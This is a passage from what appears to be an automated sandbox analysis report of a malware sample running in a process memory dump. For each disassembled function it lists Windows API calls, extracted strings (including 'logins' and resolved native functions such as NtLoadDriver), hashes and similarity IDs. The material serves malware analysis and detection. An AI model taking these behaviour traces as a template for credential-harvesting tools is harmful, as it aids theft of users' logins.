                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004115C8
                                                                                                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                                                                                                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                                                                                                          • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1043902810-0
                                                                                                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                                                                                                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                          • API String ID: 3330709923-517860148
                                                                                                                                                                                                          • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                            • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                          • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                          • String ID: logins$null
                                                                                                                                                                                                          • API String ID: 3492182834-2163367763
                                                                                                                                                                                                          • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                          • String ID: ---
                                                                                                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                                                                                                          • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1010922700-0
                                                                                                                                                                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
